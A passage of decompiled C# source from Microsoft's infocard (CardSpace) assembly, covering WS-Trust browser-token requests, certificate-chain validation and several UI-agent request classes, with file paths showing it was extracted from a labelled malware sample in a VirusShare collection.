throw InfoCardTrace.ThrowHelperError((Exception) new TrustExchangeException(SR.GetString("ServiceFailedToWriteToken"), ex));
throw;
}
}
protected override void OnProcess()
{
try
{
if (this.m_svcEpr == null)
{
base.OnProcess();
if (this.ProcessingException != null)
throw InfoCardTrace.ThrowHelperError(this.ProcessingException);
using (MemoryStream output = new MemoryStream())
{
using (XmlWriter w = XmlWriter.Create((Stream) output, new XmlWriterSettings()
{
CloseOutput = false,
Encoding = Encoding.UTF8,
OmitXmlDeclaration = true
}))
this.Token.ProtectedToken.WriteTo(w);
this.m_rawToken = new byte[output.Length - 3L];
Array.Copy((Array) output.GetBuffer(), 3, (Array) this.m_rawToken, 0, Convert.ToInt32(output.Length - 3L));
}
}
else
{
GetBrowserTokenRequest.CreateIssuedTokenClientCredentials clientCredentials = this.CreateClientCredentials(this.m_svcEpr);
clientCredentials.Windows.AllowNtlm = false;
Binding binding = GetBrowserTokenRequest.FedChainUpdateProxyAndRestrictTransportBindingWrapper(this.m_svcEpr.Binding, this.UserProxy);
using (ChannelFactory<GetBrowserTokenRequest.ISts> channelFactory = new ChannelFactory<GetBrowserTokenRequest.ISts>(binding, this.m_svcEpr.Address))
{
channelFactory.Endpoint.Binding.OpenTimeout = new TimeSpan(5, 0, 0);
channelFactory.Endpoint.Binding.SendTimeout = new TimeSpan(5, 0, 0);
channelFactory.Endpoint.Binding.ReceiveTimeout = new TimeSpan(5, 0, 0);
channelFactory.Endpoint.Binding.CloseTimeout = new TimeSpan(5, 0, 0);
channelFactory.Endpoint.Behaviors.Remove<ClientCredentials>();
channelFactory.Endpoint.Behaviors.Add((IEndpointBehavior) clientCredentials);
InfoCardTrace.Assert(!channelFactory.Credentials.Windows.AllowNtlm, "Should be false");
GetBrowserTokenRequest.ISts sts = channelFactory.CreateChannel();
if (this.Policy == null)
this.CreateInfoCardPolicyFromBrowserParams();
Message rstMsg = Message.CreateMessage(this.m_svcEpr.Binding.MessageVersion, this.m_protocolProfile.WSTrust.RequestSecurityTokenAction, (BodyWriter) new RequestSecurityTokenForGetBrowserToken(new RequestSecurityTokenParameters(this.m_svcEpr.Binding.MessageVersion.Addressing, this.m_params, this.m_protocolProfile, this.Policy, true)));
Message rstrMsg = (Message) null;
if (XmlNames.WSSpecificationVersion.WSTrustXmlSoap2005 == this.m_protocolProfile.WSTrust.Version)
this.ExecuteCancelable((ClientRequest.AsyncEntryCallback) (() => rstrMsg = sts.ProcessRequestSecurityTokenFeb2005(rstMsg)), (ClientRequest.AsyncEntryCallback) (() => channelFactory.Abort()));
else if (XmlNames.WSSpecificationVersion.WSTrustOasis2007 == this.m_protocolProfile.WSTrust.Version)
this.ExecuteCancelable((ClientRequest.AsyncEntryCallback) (() => rstrMsg = sts.ProcessRequestSecurityTokenWSTrust13(rstMsg)), (ClientRequest.AsyncEntryCallback) (() => channelFactory.Abort()));
else
InfoCardTrace.Assert(false, "Unsupported version of WS-Trust detected");
InfoCardTrace.Assert(null != rstrMsg, "Should have thrown before this if message is null");
WSIdentityFaultException.ThrowIfFaultMessage(rstrMsg, CultureInfo.GetCultureInfo(this.UserLanguage));
using (XmlReader readerAtBodyContents = (XmlReader) rstrMsg.GetReaderAtBodyContents())
{
using (MemoryStream output = new MemoryStream())
{
using (XmlWriter writer = XmlWriter.Create((Stream) output, new XmlWriterSettings()
{
CloseOutput = false,
Encoding = Encoding.UTF8,
OmitXmlDeclaration = true
}))
this.WriteRequestedTokenFrom(readerAtBodyContents, writer);
this.m_rawToken = new byte[output.Length - 3L];
Array.Copy((Array) output.GetBuffer(), 3, (Array) this.m_rawToken, 0, Convert.ToInt32(output.Length - 3L));
}
}
channelFactory.Close();
}
}
}
catch (InfoCardBaseException ex)
{
throw;
}
catch (Exception ex)
{
if (!InfoCardTrace.IsFatal(ex))
throw InfoCardTrace.ThrowHelperError((Exception) new TrustExchangeException(SR.GetString("ServiceSTSCommunicationFailed"), ex));
throw;
}
}
public static void WriteSourceUrlAppliesTo(
XmlWriter writer,
GetBrowserTokenParameters browserParams,
ProtocolProfile profile)
{
EndpointAddress endpointAddress = browserParams.Recipient.CreateEndpointAddress();
writer.WriteStartElement(profile.WSPolicy.DefaultPrefix, profile.WSPolicy.AppliesTo, profile.WSPolicy.Namespace);
endpointAddress.WriteTo(AddressingVersion.WSAddressing10, writer);
writer.WriteEndElement();
}
private static void CheckOptionalTokenParameters(
SupportingTokenParameters oestp,
IDictionary<string, SupportingTokenParameters> oostp,
ref bool disallowedStpDetected)
{
ThrowOnMultipleAssignment<IssuedSecurityTokenParameters> issuedTokenParameters = new ThrowOnMultipleAssignment<IssuedSecurityTokenParameters>(SR.GetString("TooManyIssuedSecurityTokenParameters"));
GetBrowserTokenRequest.GetIssuedSecurityTokenParametersFromSupportingTokenParameters(oestp, issuedTokenParameters, ref disallowedStpDetected);
foreach (SupportingTokenParameters parameters in (IEnumerable<SupportingTokenParameters>) oostp.Values)
GetBrowserTokenRequest.GetIssuedSecurityTokenParametersFromSupportingTokenParameters(parameters, issuedTokenParameters, ref disallowedStpDetected);
}
public static IssuedSecurityTokenParameters TryGetNextStsIssuedTokenParameters(
BindingElementCollection bindingElements,
ref bool disallowedStpDetected)
{
if (bindingElements == null)
return (IssuedSecurityTokenParameters) null;
ThrowOnMultipleAssignment<IssuedSecurityTokenParameters> issuedTokenParameters = new ThrowOnMultipleAssignment<IssuedSecurityTokenParameters>(SR.GetString("TooManyIssuedSecurityTokenParameters"));
SecurityBindingElement securityBindingElement1 = bindingElements.Find<SecurityBindingElement>();
if (securityBindingElement1 == null)
return (IssuedSecurityTokenParameters) null;
GetBrowserTokenRequest.GetIssuedSecurityTokenParametersFromSupportingTokenParameters(securityBindingElement1.EndpointSupportingTokenParameters, issuedTokenParameters, ref disallowedStpDetected);
foreach (SupportingTokenParameters parameters in (IEnumerable<SupportingTokenParameters>) securityBindingElement1.OperationSupportingTokenParameters.Values)
GetBrowserTokenRequest.GetIssuedSecurityTokenParametersFromSupportingTokenParameters(parameters, issuedTokenParameters, ref disallowedStpDetected);
switch (securityBindingElement1)
{
case AsymmetricSecurityBindingElement _:
AsymmetricSecurityBindingElement securityBindingElement2 = (AsymmetricSecurityBindingElement) securityBindingElement1;
GetBrowserTokenRequest.CheckAndAssignIssuedTokenParameters(securityBindingElement2.InitiatorTokenParameters, issuedTokenParameters, ref disallowedStpDetected);
GetBrowserTokenRequest.CheckAndAssignIssuedTokenParameters(securityBindingElement2.RecipientTokenParameters, issuedTokenParameters, ref disallowedStpDetected);
break;
case SymmetricSecurityBindingElement _:
SecurityTokenParameters protectionTokenParameters = ((SymmetricSecurityBindingElement) securityBindingElement1).ProtectionTokenParameters;
if (protectionTokenParameters is SecureConversationSecurityTokenParameters)
{
SecureConversationSecurityTokenParameters securityTokenParameters = (SecureConversationSecurityTokenParameters) protectionTokenParameters;
BindingElementCollection bindingElements1 = new BindingElementCollection();
if (securityTokenParameters.BootstrapSecurityBindingElement != null)
bindingElements1.Add((BindingElement) securityTokenParameters.BootstrapSecurityBindingElement);
GetBrowserTokenRequest.CheckAndAssignIssuedTokenParameters((SecurityTokenParameters) GetBrowserTokenRequest.TryGetNextStsIssuedTokenParameters(bindingElements1, ref disallowedStpDetected), issuedTokenParameters, ref disallowedStpDetected);
break;
}
GetBrowserTokenRequest.CheckAndAssignIssuedTokenParameters(protectionTokenParameters, issuedTokenParameters, ref disallowedStpDetected);
break;
}
GetBrowserTokenRequest.CheckOptionalTokenParameters(securityBindingElement1.OptionalEndpointSupportingTokenParameters, securityBindingElement1.OptionalOperationSupportingTokenParameters, ref disallowedStpDetected);
return issuedTokenParameters.Value;
}
public static void CheckAndAssignIssuedTokenParameters(
SecurityTokenParameters stp,
ThrowOnMultipleAssignment<IssuedSecurityTokenParameters> issuedTokenParameters,
ref bool disallowedStpDetected)
{
if (stp == null)
return;
InfoCardTrace.Assert(null == stp as SecureConversationSecurityTokenParameters, "Should have already filtered this");
if (stp is IssuedSecurityTokenParameters || stp is RsaSecurityTokenParameters || stp is SslSecurityTokenParameters || stp is X509SecurityTokenParameters)
issuedTokenParameters.Value = stp as IssuedSecurityTokenParameters;
else
disallowedStpDetected = true;
}
private static void GetIssuedSecurityTokenParametersFromSupportingTokenParameters(
SupportingTokenParameters parameters,
ThrowOnMultipleAssignment<IssuedSecurityTokenParameters> issuedTokenParameters,
ref bool disallowedStpDetected)
{
GetBrowserTokenRequest.GetIssuedSecurityTokenParametersFromCollection(parameters.Endorsing, issuedTokenParameters, ref disallowedStpDetected);
GetBrowserTokenRequest.GetIssuedSecurityTokenParametersFromCollection(parameters.SignedEndorsing, issuedTokenParameters, ref disallowedStpDetected);
GetBrowserTokenRequest.GetIssuedSecurityTokenParametersFromCollection(parameters.Signed, issuedTokenParameters, ref disallowedStpDetected);
GetBrowserTokenRequest.GetIssuedSecurityTokenParametersFromCollection(parameters.SignedEncrypted, issuedTokenParameters, ref disallowedStpDetected);
}
private static void GetIssuedSecurityTokenParametersFromCollection(
Collection<SecurityTokenParameters> collection,
ThrowOnMultipleAssignment<IssuedSecurityTokenParameters> issuedTokenParameters,
ref bool disallowedStpDetected)
{
foreach (SecurityTokenParameters stp in collection)
{
if (stp is SecureConversationSecurityTokenParameters)
{
SecureConversationSecurityTokenParameters securityTokenParameters = (SecureConversationSecurityTokenParameters) stp;
BindingElementCollection bindingElements = new BindingElementCollection();
if (securityTokenParameters.BootstrapSecurityBindingElement != null)
bindingElements.Add((BindingElement) securityTokenParameters.BootstrapSecurityBindingElement);
GetBrowserTokenRequest.CheckAndAssignIssuedTokenParameters((SecurityTokenParameters) GetBrowserTokenRequest.TryGetNextStsIssuedTokenParameters(bindingElements, ref disallowedStpDetected), issuedTokenParameters, ref disallowedStpDetected);
}
else
GetBrowserTokenRequest.CheckAndAssignIssuedTokenParameters(stp, issuedTokenParameters, ref disallowedStpDetected);
}
}
private GetBrowserTokenRequest.CreateIssuedTokenClientCredentials CreateClientCredentials(
ServiceEndpoint svcEpr)
{
GetBrowserTokenRequest.CreateIssuedTokenClientCredentials clientCredentials = new GetBrowserTokenRequest.CreateIssuedTokenClientCredentials(this);
EndpointAddress endpointAddress = svcEpr.Address;
Binding binding = svcEpr.Binding;
X509Certificate2Collection certificate2Collection = new X509Certificate2Collection();
bool disallowedStpDetected = false;
try
{
while (binding != null)
{
IssuedSecurityTokenParameters issuedTokenParameters = GetBrowserTokenRequest.TryGetNextStsIssuedTokenParameters(binding.CreateBindingElements(), ref disallowedStpDetected);
if (issuedTokenParameters != null)
{
if (disallowedStpDetected)
throw InfoCardTrace.ThrowHelperError((Exception) new UnsupportedPolicyOptionsException());
if (!((EndpointAddress) null == issuedTokenParameters.IssuerAddress) && !((Uri) null == issuedTokenParameters.IssuerAddress.Uri))
{
if (endpointAddress.Identity is X509CertificateEndpointIdentity identity)
{
certificate2Collection.AddRange(identity.Certificates);
certificate2Collection.Remove(identity.Certificates[0]);
bool chainTrustPassed = false;
InfoCardX509Validator.ValidateChainOrPeer(identity.Certificates[0], certificate2Collection, out chainTrustPassed);
clientCredentials.ServiceCertificate.ScopedCertificates.Add(endpointAddress.Uri, identity.Certificates[0]);
}
binding = issuedTokenParameters.IssuerBinding;
endpointAddress = issuedTokenParameters.IssuerAddress;
}
else
break;
}
else
break;
}
if (this.m_params.Issuer.LeafCertificate != null)
{
bool chainTrustPassed = false;
InfoCardX509Validator.ValidateChainOrPeer(this.m_params.Issuer.LeafCertificate, this.m_params.Issuer.SupportingCertificates, out chainTrustPassed);
clientCredentials.ServiceCertificate.DefaultCertificate = this.m_params.Issuer.LeafCertificate;
certificate2Collection.AddRange(this.m_params.Issuer.SupportingCertificates);
}
else
{
if (!(svcEpr.Address.Identity is X509CertificateEndpointIdentity identity))
throw InfoCardTrace.ThrowHelperError((Exception) new TrustExchangeException(SR.GetString("InvalidIPSTSPolicy")));
clientCredentials.ServiceCertificate.DefaultCertificate = identity.Certificates[0];
certificate2Collection.AddRange(identity.Certificates);
certificate2Collection.Remove(identity.Certificates[0]);
}
InfoCardTrace.Assert(null != clientCredentials.ServiceCertificate.DefaultCertificate, "This is configured in both cases above - either via the incoming params or via the endpoint retrieved from mex");
clientCredentials.ServiceCertificate.Authentication.CertificateValidationMode = X509CertificateValidationMode.Custom;
clientCredentials.ServiceCertificate.Authentication.CustomCertificateValidator = InfoCardX509Validator.Create(certificate2Collection);
}
catch (SecurityTokenValidationException ex)
{
throw InfoCardTrace.ThrowHelperError((Exception) new IdentityValidationException(SR.GetString("RecipientCertificateNotValid"), (Exception) ex));
}
return clientCredentials;
}
private void WriteRequestedTokenFrom(XmlReader reader, XmlWriter writer)
{
while (reader.Read())
{
if (reader.IsStartElement(this.m_protocolProfile.WSTrust.RequestedSecurityToken, this.m_protocolProfile.WSTrust.Namespace))
{
reader.Read();
writer.WriteNode(reader, false);
return;
}
}
throw InfoCardTrace.ThrowHelperError((Exception) new TrustExchangeException(SR.GetString("NoTokenReturned")));
}
private ServiceEndpointCollection GetServiceEndpointCollection(
Uri serviceUri,
Uri mexUri)
{
bool flag = false;
InfoCardMetadataExchangeClient mex = new InfoCardMetadataExchangeClient();
mex.Proxy = this.UserProxy;
MetadataSet metadataSet = (MetadataSet) null;
mex.ResolveMetadataReferences = true;
mex.MaximumResolvedReferences = InfoCardConstants.MaximumMexChainLength;
EndpointAddress metadataAddress = new EndpointAddress(mexUri, new AddressHeader[0]);
try
{
this.ExecuteCancelable((ClientRequest.AsyncEntryCallback) (() => metadataSet = mex.GetMetadata(metadataAddress)), (ClientRequest.AsyncEntryCallback) (() => mex.Abort()));
flag = true;
}
catch (Exception ex)
{
if (InfoCardTrace.IsFatal(ex))
throw;
}
if (!flag)
{
try
{
this.ExecuteCancelable((ClientRequest.AsyncEntryCallback) (() => metadataSet = mex.GetMetadata(mexUri, MetadataExchangeClientMode.HttpGet)), (ClientRequest.AsyncEntryCallback) (() => mex.Abort()));
flag = true;
}
catch (Exception ex)
{
if (InfoCardTrace.IsFatal(ex))
throw;
}
}
if (!flag)
throw InfoCardTrace.ThrowHelperError((Exception) new TrustExchangeException(SR.GetString("EndpointNotFound")));
WsdlImporter imp = new WsdlImporter(metadataSet);
imp.State.Add((object) "MetadataExchangeClientKey", (object) mex);
ServiceEndpointCollection serviceEndpoints = (ServiceEndpointCollection) null;
this.ExecuteCancelable((ClientRequest.AsyncEntryCallback) (() => serviceEndpoints = imp.ImportAllEndpoints()), (ClientRequest.AsyncEntryCallback) null);
return serviceEndpoints;
}
private static BindingElementCollection FedChainUpdateProxyForHttpAndRestrictTransportBinding(
BindingElementCollection bindingElements,
IWebProxy proxy)
{
bindingElements = Utility.UpdateProxyForHttpAndRestrictTransportBinding(bindingElements, proxy, true);
bool disallowedStpDetected = false;
IssuedSecurityTokenParameters issuedTokenParameters = GetBrowserTokenRequest.TryGetNextStsIssuedTokenParameters(bindingElements, ref disallowedStpDetected);
if (issuedTokenParameters != null && (EndpointAddress) null != issuedTokenParameters.IssuerAddress && (Uri) null != issuedTokenParameters.IssuerAddress.Uri && issuedTokenParameters.IssuerBinding != null)
issuedTokenParameters.IssuerBinding = (Binding) new CustomBinding(GetBrowserTokenRequest.FedChainUpdateProxyForHttpAndRestrictTransportBinding(issuedTokenParameters.IssuerBinding.CreateBindingElements(), proxy));
return bindingElements;
}
private static Binding FedChainUpdateProxyAndRestrictTransportBindingWrapper(
Binding binding,
IWebProxy proxy)
{
return (Binding) new CustomBinding(GetBrowserTokenRequest.FedChainUpdateProxyForHttpAndRestrictTransportBinding(binding.CreateBindingElements(), proxy));
}
private SecurityToken CreateIssuedToken(
CardSpacePolicyElement[] policyElements,
SecurityTokenSerializer tokenSerializer)
{
WindowsImpersonationContext impersonationContext = this.RequestorIdentity.Impersonate();
try
{
try
{
int index1 = policyElements.Length - 1;
InfoCardTrace.Assert(0 <= index1, "lastElementIndex should be non-negative");
if (policyElements[index1].IsManagedIssuer)
--index1;
int length = index1;
if (0 < length)
{
InfoCardPolicy[] infoCardPolicyArray = new InfoCardPolicy[length];
for (int index2 = 0; index2 < length; ++index2)
{
infoCardPolicyArray[index2] = PolicyFactory.CreatePolicyForIntermediateGetBrowserTokenRequest(policyElements[index2], (Uri) null, 0U, (RecipientIdentity) null);
infoCardPolicyArray[index2].Validate();
}
}
InfoCardPolicy browserTokenRequest = PolicyFactory.CreatePolicyForGetBrowserTokenRequest(policyElements[index1], this.m_params.PrivacyUrl, this.m_params.PrivacyVersion, RecipientIdentity.CreateIdentity(this.m_params.Recipient.CreateEndpointAddress(), true), PolicyUsageContext.GetToken);
browserTokenRequest.Validate();
this.Policy = browserTokenRequest;
base.OnProcess();
if (this.ProcessingException != null)
throw InfoCardTrace.ThrowHelperError(this.ProcessingException);
SecurityKeyIdentifierClause internalTokenReference = tokenSerializer.ReadKeyIdentifierClause((XmlReader) Utility.CreateReaderWithQuotas(this.Token.InternalTokenReference));
SecurityKeyIdentifierClause externalTokenReference = tokenSerializer.ReadKeyIdentifierClause((XmlReader) Utility.CreateReaderWithQuotas(this.Token.ExternalTokenReference));
this.m_proofToken = this.Token.SymmetricProof != null ? new SelfIssuedAuthProofToken(new InMemorySymmetricSecurityKey(this.Token.SymmetricProof.Key), this.Token.ExpirationTime) : new SelfIssuedAuthProofToken(this.GetPrivateCryptography(), this.Token.ExpirationTime);
return (SecurityToken) new GenericXmlSecurityToken(this.Token.ProtectedToken, (SecurityToken) this.m_proofToken, this.Token.EffectiveTime, this.Token.ExpirationTime, internalTokenReference, externalTokenReference, (ReadOnlyCollection<IAuthorizationPolicy>) null);
}
finally
{
impersonationContext.Undo();
}
}
catch
{
throw;
}
}
protected override void OnDisposeAsUser()
{
base.OnDisposeAsUser();
if (this.m_proofToken == null)
return;
this.m_proofToken.Dispose();
this.m_proofToken = (SelfIssuedAuthProofToken) null;
}
private class CreateIssuedTokenClientCredentials : ClientCredentials
{
private GetBrowserTokenRequest request;
public CreateIssuedTokenClientCredentials(GetBrowserTokenRequest request)
{
InfoCardTrace.ThrowInvalidArgumentConditional(request == null, nameof (request));
this.request = request;
}
protected internal CreateIssuedTokenClientCredentials(
GetBrowserTokenRequest.CreateIssuedTokenClientCredentials other)
: base((ClientCredentials) other)
{
this.request = other.request;
}
protected override ClientCredentials CloneCore() => (ClientCredentials) new GetBrowserTokenRequest.CreateIssuedTokenClientCredentials(this);
protected internal override SecurityToken GetInfoCardSecurityToken(
bool requiresInfoCard,
CardSpacePolicyElement[] chain,
SecurityTokenSerializer tokenSerializer)
{
return this.request.CreateIssuedToken(chain, tokenSerializer);
}
public override void ApplyClientBehavior(
ServiceEndpoint serviceEndpoint,
ClientRuntime behavior)
{
base.ApplyClientBehavior(serviceEndpoint, behavior);
bool flag = false;
foreach (IInteractiveChannelInitializer channelInitializer in behavior.InteractiveChannelInitializers)
{
if (channelInitializer is InfocardInteractiveChannelInitializer)
{
flag = true;
break;
}
}
if (!flag)
throw InfoCardTrace.ThrowHelperError((Exception) new TrustExchangeException(SR.GetString("IdentityProviderRequestedUnsupportedAuthType")));
}
}
[ServiceContract]
internal interface ISts
{
[OperationContract(Action = "http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue", Name = "ProcessRequestSecurityTokenFeb2005", ProtectionLevel = ProtectionLevel.EncryptAndSign, ReplyAction = "http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue")]
Message ProcessRequestSecurityTokenFeb2005(Message rstMessage);
[OperationContract(Action = "http://docs.oasis-open.org/ws-sx/ws-trust/200512/RST/Issue", Name = "ProcessRequestSecurityTokenWSTrust13", ProtectionLevel = ProtectionLevel.EncryptAndSign, ReplyAction = "http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTRC/IssueFinal")]
Message ProcessRequestSecurityTokenWSTrust13(Message rstMessage);
}
}
}
MSIL/Virus/Win32/E/Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d/Microsoft/InfoCards/GetCardDetailsRequest.cs
+42
View File
@@ -0,0 +1,42 @@
// Decompiled with JetBrains decompiler
// Type: Microsoft.InfoCards.GetCardDetailsRequest
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using System;
using System.IO;
using System.Text;
namespace Microsoft.InfoCards
{
internal class GetCardDetailsRequest : UIAgentRequest
{
private InfoCard m_card;
private bool m_cardMatchesPolicyRequirements;
public GetCardDetailsRequest(
IntPtr rpcHandle,
Stream inArgs,
Stream outArgs,
ClientUIRequest parent)
: base(rpcHandle, inArgs, outArgs, parent)
{
}
protected override void OnInitializeAsSystem() => base.OnInitializeAsSystem();
protected override void OnMarshalInArgs()
{
Stream inArgs = this.InArgs;
this.m_card = new InfoCard(inArgs);
this.m_card.GetExtendedInformation().Deserialize(inArgs);
this.m_card.GetRPIdentityRequirement().Deserialize(inArgs);
this.m_card.GetClaims().Deserialize(inArgs);
}
protected override void OnProcess() => this.m_cardMatchesPolicyRequirements = this.m_card.DoesCardMatchPolicySet(this.GetPolicy());
protected override void OnMarshalOutArgs() => new BinaryWriter(this.OutArgs, Encoding.Unicode).Write(this.m_cardMatchesPolicyRequirements);
}
}
MSIL/Virus/Win32/E/Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d/Microsoft/InfoCards/GetCertificateRequest.cs
+40
View File
@@ -0,0 +1,40 @@
// Decompiled with JetBrains decompiler
// Type: Microsoft.InfoCards.GetCertificateRequest
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using Microsoft.InfoCards.Diagnostics;
using System;
using System.IO;
using System.Security.Cryptography.X509Certificates;
using System.Text;
namespace Microsoft.InfoCards
{
internal class GetCertificateRequest : UIAgentRequest
{
private string m_recipientIdentifier;
private X509Certificate2 m_certificate;
public GetCertificateRequest(
IntPtr rpcHandle,
Stream inArgs,
Stream outArgs,
ClientUIRequest parent)
: base(rpcHandle, inArgs, outArgs, parent)
{
}
protected override void OnMarshalInArgs() => this.m_recipientIdentifier = Utility.DeserializeString(new BinaryReader(this.InArgs, Encoding.Unicode));
protected override void OnProcess()
{
this.m_certificate = this.ParentRequest.CertCacheFind(this.m_recipientIdentifier);
if (this.m_certificate == null)
throw InfoCardTrace.ThrowHelperError((Exception) new InfoCardArgumentException(SR.GetString("NoCachedCertificateForRecipient")));
}
protected override void OnMarshalOutArgs() => Utility.SerializeBytes(new BinaryWriter(this.OutArgs, Encoding.Unicode), this.m_certificate.GetRawCertData());
}
}
MSIL/Virus/Win32/E/Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d/Microsoft/InfoCards/GetCryptoTransformRequest.cs
+58
View File
@@ -0,0 +1,58 @@
// Decompiled with JetBrains decompiler
// Type: Microsoft.InfoCards.GetCryptoTransformRequest
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using Microsoft.InfoCards.Diagnostics;
using System;
using System.Diagnostics;
using System.IO;
using System.Security.Cryptography;
using System.Security.Principal;
using System.Text;
namespace Microsoft.InfoCards
{
internal class GetCryptoTransformRequest : ClientRequest
{
private int m_cryptoSession;
private CipherMode m_mode;
private PaddingMode m_padding;
private int m_feedbackSize;
private SymmetricCryptoSession.Direction m_direction;
private byte[] m_iv;
private TransformCryptoSession m_transformSession;
public GetCryptoTransformRequest(
Process callingProcess,
WindowsIdentity callingIdentity,
IntPtr rpcHandle,
Stream inArgs,
Stream outArgs)
: base(callingProcess, callingIdentity, rpcHandle, inArgs, outArgs)
{
}
protected override void OnMarshalInArgs()
{
BinaryReader binaryReader = (BinaryReader) new InfoCardBinaryReader(this.InArgs, Encoding.Unicode);
this.m_cryptoSession = binaryReader.ReadInt32();
this.m_mode = (CipherMode) binaryReader.ReadInt32();
this.m_padding = (PaddingMode) binaryReader.ReadInt32();
this.m_feedbackSize = binaryReader.ReadInt32();
this.m_direction = (SymmetricCryptoSession.Direction) binaryReader.ReadInt32();
this.m_iv = binaryReader.ReadBytes(binaryReader.ReadInt32());
InfoCardTrace.ThrowInvalidArgumentConditional(0 == this.m_feedbackSize, "feedbackSize");
}
protected override void OnProcess() => this.m_transformSession = ((SymmetricCryptoSession) CryptoSession.Find(this.m_cryptoSession, this.CallerPid, this.RequestorIdentity.User)).GetCryptoTransform(this.m_mode, this.m_padding, this.m_feedbackSize, this.m_direction, this.m_iv);
protected override void OnMarshalOutArgs()
{
BinaryWriter bwriter = new BinaryWriter(this.OutArgs, Encoding.Unicode);
this.m_transformSession.Write(bwriter);
bwriter.Flush();
}
}
}
MSIL/Virus/Win32/E/Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d/Microsoft/InfoCards/GetFileNameResult.cs
+26
View File
@@ -0,0 +1,26 @@
// Decompiled with JetBrains decompiler
// Type: Microsoft.InfoCards.GetFileNameResult
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
namespace Microsoft.InfoCards
{
internal class GetFileNameResult
{
private string m_fileName;
private byte[] m_fileContent;
public string FileName
{
set => this.m_fileName = value;
get => this.m_fileName;
}
public byte[] FileContent
{
set => this.m_fileContent = value;
get => this.m_fileContent;
}
}
}
MSIL/Virus/Win32/E/Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d/Microsoft/InfoCards/GetImportFileNameRequest.cs
+44
View File
@@ -0,0 +1,44 @@
// Decompiled with JetBrains decompiler
// Type: Microsoft.InfoCards.GetImportFileNameRequest
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using Microsoft.InfoCards.Diagnostics;
using System;
using System.IO;
using System.Text;
namespace Microsoft.InfoCards
{
internal class GetImportFileNameRequest : UIAgentRequest
{
private string m_filename = string.Empty;
public GetImportFileNameRequest(
IntPtr rpcHandle,
Stream inArgs,
Stream outArgs,
ClientUIRequest parent)
: base(rpcHandle, inArgs, outArgs, parent)
{
}
protected override void OnMarshalInArgs()
{
}
protected override void OnProcess()
{
if (this.ParentRequest is ImportRequest)
{
this.m_filename = (this.ParentRequest as ImportRequest).ImportedFile;
InfoCardTrace.Assert(!string.IsNullOrEmpty(this.m_filename), "No file name provided for import");
}
else
InfoCardTrace.Assert(false, "The parent of this request MUST be ImportRequest");
}
protected override void OnMarshalOutArgs() => Utility.SerializeString(new BinaryWriter(this.OutArgs, Encoding.Unicode), this.m_filename);
}
}
MSIL/Virus/Win32/E/Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d/Microsoft/InfoCards/GetImportedCardRequest.cs
+120
View File
@@ -0,0 +1,120 @@
// Decompiled with JetBrains decompiler
// Type: Microsoft.InfoCards.GetImportedCardRequest
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using Microsoft.InfoCards.Diagnostics;
using System;
using System.Collections.Generic;
using System.Globalization;
using System.IO;
using System.Security.Cryptography.X509Certificates;
using System.Text;
namespace Microsoft.InfoCards
{
internal class GetImportedCardRequest : UIAgentRequest
{
private InfoCard m_card;
private Recipient m_issuer;
private string m_filename;
private string m_policyLink;
private InfoCardPolicy m_policy;
private GetImportedCardRequest.ImportCardMatchStatus m_matchFlag;
public GetImportedCardRequest(
IntPtr rpcHandle,
Stream inArgs,
Stream outArgs,
ClientUIRequest parent)
: base(rpcHandle, inArgs, outArgs, parent)
{
this.m_matchFlag = GetImportedCardRequest.ImportCardMatchStatus.MatchNone;
}
protected override void OnInitializeAsSystem()
{
base.OnInitializeAsSystem();
this.m_policy = this.GetPolicy();
}
protected override void OnMarshalInArgs() => this.m_filename = Utility.DeserializeString((BinaryReader) new InfoCardBinaryReader(this.InArgs, Encoding.Unicode));
protected override void OnProcess()
{
